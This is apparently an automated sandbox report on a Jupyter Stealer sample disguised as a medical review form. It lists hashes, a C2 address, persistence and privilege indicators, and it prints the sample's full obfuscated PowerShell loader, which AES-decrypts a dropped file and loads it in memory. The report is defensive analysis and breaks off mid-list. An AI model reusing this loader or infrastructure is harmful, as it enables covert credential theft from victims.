Analysis
-
max time kernel
287s -
max time network
281s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
13-06-2022 02:20
Static task
static1
General
-
Target
Mto-Medical-Review-Form.exe
-
Size
261.0MB
-
MD5
7194384ed0ce511e24b0e119d0d068f6
-
SHA1
9ea9e3f52602988a922e8d8fda000f060be2b248
-
SHA256
7cc35fbce4b353c541f1ee62366248cc072d1c7ce38b1d5ef5db4a2414f26e08
-
SHA512
0faea84e368d301b7b056630b82c9f2a49f01252e66f5699ddf81f879d22fc74e08a810252e87a58cd9e5b147e9c1682678308781d08fd65e2edb2c8017c98d7
Malware Config
Extracted
jupyter
http://146.70.53.153
Signatures
-
suricata: ET MALWARE Jupyter Stealer CnC Checkin
suricata: ET MALWARE Jupyter Stealer CnC Checkin
-
Executes dropped EXE 2 IoCs
pid Process 1016 zfkpldoq.exe 816 zfkpldoq.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dMMoeMpWZcmcIbReTwtIdx.lnk Mto-Medical-Review-Form.exe -
Loads dropped DLL 13 IoCs
pid Process 1016 zfkpldoq.exe 1016 zfkpldoq.exe 2600 MsiExec.exe 2600 MsiExec.exe 2600 MsiExec.exe 2600 MsiExec.exe 3208 MsiExec.exe 3208 MsiExec.exe 3208 MsiExec.exe 3208 MsiExec.exe 3208 MsiExec.exe 1016 zfkpldoq.exe 1016 zfkpldoq.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: zfkpldoq.exe File opened (read-only) \??\I: zfkpldoq.exe File opened (read-only) \??\J: zfkpldoq.exe File opened (read-only) \??\W: zfkpldoq.exe File opened (read-only) \??\L: zfkpldoq.exe File opened (read-only) \??\Q: zfkpldoq.exe File opened (read-only) \??\B: zfkpldoq.exe File opened (read-only) \??\K: zfkpldoq.exe File opened (read-only) \??\X: zfkpldoq.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\P: zfkpldoq.exe File opened (read-only) \??\V: zfkpldoq.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: zfkpldoq.exe File opened (read-only) \??\M: zfkpldoq.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\G: zfkpldoq.exe File opened (read-only) \??\V: zfkpldoq.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: zfkpldoq.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\T: zfkpldoq.exe File opened (read-only) \??\Y: zfkpldoq.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: zfkpldoq.exe File opened (read-only) \??\Q: zfkpldoq.exe File opened (read-only) \??\A: zfkpldoq.exe File opened (read-only) \??\Z: zfkpldoq.exe File opened (read-only) \??\Z: zfkpldoq.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\K: zfkpldoq.exe File opened (read-only) \??\N: zfkpldoq.exe File opened (read-only) \??\F: zfkpldoq.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\R: zfkpldoq.exe File opened (read-only) \??\L: zfkpldoq.exe File opened (read-only) \??\R: zfkpldoq.exe File opened (read-only) \??\S: zfkpldoq.exe File opened (read-only) \??\W: zfkpldoq.exe File opened (read-only) \??\Y: zfkpldoq.exe File opened (read-only) \??\U: zfkpldoq.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: zfkpldoq.exe File opened (read-only) \??\O: zfkpldoq.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: zfkpldoq.exe File opened (read-only) \??\P: zfkpldoq.exe File opened (read-only) \??\H: zfkpldoq.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: zfkpldoq.exe File opened (read-only) \??\T: zfkpldoq.exe File opened (read-only) \??\E: zfkpldoq.exe File opened (read-only) \??\G: zfkpldoq.exe -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Free PDF Soulutions\PDF Merge\PdfMerge.exe msiexec.exe File created C:\Program Files (x86)\Free PDF Soulutions\PDF Merge\Uninstall.lnk msiexec.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI149D.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI1953.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1D0F.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI1914.tmp msiexec.exe File opened for modification C:\Windows\Installer\e580923.msi msiexec.exe File created C:\Windows\Installer\SourceHash{50217A00-46B2-40E3-8664-5C93BFFA03B0} msiexec.exe File created C:\Windows\Installer\{50217A00-46B2-40E3-8664-5C93BFFA03B0}\SystemFoldermsiexec.exe msiexec.exe File opened for modification C:\Windows\Installer\{50217A00-46B2-40E3-8664-5C93BFFA03B0}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\Installer\e580925.msi msiexec.exe File created C:\Windows\Installer\e580923.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA2C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI15B8.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe -
Modifies data under HKEY_USERS 5 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e msiexec.exe -
Modifies registry class 30 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\Free PDF Soulutions\\PDF Merge 1.0.0\\install\\FFA03B0\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\loxwargywpsyvqpsnwolannnegevmw\shell\open\command Mto-Medical-Review-Form.exe Set value (str) \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\.nmmwzkobflkuwfswhiybdsdgp\ = "loxwargywpsyvqpsnwolannnegevmw" Mto-Medical-Review-Form.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F4F0CA507A84F414BAC0C1BAD6DB30E5 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F4F0CA507A84F414BAC0C1BAD6DB30E5\00A712052B643E046846C539FBAF300B msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\loxwargywpsyvqpsnwolannnegevmw\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('ggWCtN05dQLaZyRJ5b0VxCgZo3M8oTV/eM6siucTGPA=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\fJgKRgEHVqGuZAxscuYo\\WfVnvMrmirlVCzSeckNyHkmONShl.nmmwzKobFlkuWfswhiyBdSDgp'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[OX2ZGtuX4Enq17E.rm4m44ex6Y5ffYLh]::BDBOvPl7ZyRDJU_sfUSE();\"" Mto-Medical-Review-Form.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\PackageName = "setup.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\Version = "16777216" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\Free PDF Soulutions\\PDF Merge 1.0.0\\install\\FFA03B0\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Media msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\loxwargywpsyvqpsnwolannnegevmw Mto-Medical-Review-Form.exe Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\loxwargywpsyvqpsnwolannnegevmw\shell Mto-Medical-Review-Form.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00A712052B643E046846C539FBAF300B msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\loxwargywpsyvqpsnwolannnegevmw\shell\open Mto-Medical-Review-Form.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\AuthorizedLUAApp = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\ProductName = "PDF Merge" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\PackageCode = "01766D08FC959764791E3F5AB682B7F8" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\AdvertiseFlags = "388" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\00A712052B643E046846C539FBAF300B\SourceList\Net msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3578829114-180201921-3281645608-1000_Classes\.nmmwzkobflkuwfswhiybdsdgp Mto-Medical-Review-Form.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\00A712052B643E046846C539FBAF300B\MainFeature msiexec.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2456 msiexec.exe 2456 msiexec.exe 1304 Mto-Medical-Review-Form.exe 1304 Mto-Medical-Review-Form.exe 1304 Mto-Medical-Review-Form.exe 1304 Mto-Medical-Review-Form.exe 1304 Mto-Medical-Review-Form.exe 1304 Mto-Medical-Review-Form.exe 1304 Mto-Medical-Review-Form.exe 1304 Mto-Medical-Review-Form.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1016 zfkpldoq.exe Token: SeAssignPrimaryTokenPrivilege 1016 zfkpldoq.exe Token: SeLockMemoryPrivilege 1016 zfkpldoq.exe Token: SeIncreaseQuotaPrivilege 1016 zfkpldoq.exe Token: SeMachineAccountPrivilege 1016 zfkpldoq.exe Token: SeTcbPrivilege 1016 zfkpldoq.exe Token: SeSecurityPrivilege 1016 zfkpldoq.exe Token: SeTakeOwnershipPrivilege 1016 zfkpldoq.exe Token: SeLoadDriverPrivilege 1016 zfkpldoq.exe Token: SeSystemProfilePrivilege 1016 zfkpldoq.exe Token: SeSystemtimePrivilege 1016 zfkpldoq.exe Token: SeProfSingleProcessPrivilege 1016 zfkpldoq.exe Token: SeIncBasePriorityPrivilege 1016 zfkpldoq.exe Token: SeCreatePagefilePrivilege 1016 zfkpldoq.exe Token: SeCreatePermanentPrivilege 1016 zfkpldoq.exe Token: SeBackupPrivilege 1016 zfkpldoq.exe Token: SeRestorePrivilege 1016 zfkpldoq.exe Token: SeShutdownPrivilege 1016 zfkpldoq.exe Token: SeDebugPrivilege 1016 zfkpldoq.exe Token: SeAuditPrivilege 1016 zfkpldoq.exe Token: SeSystemEnvironmentPrivilege 1016 zfkpldoq.exe Token: 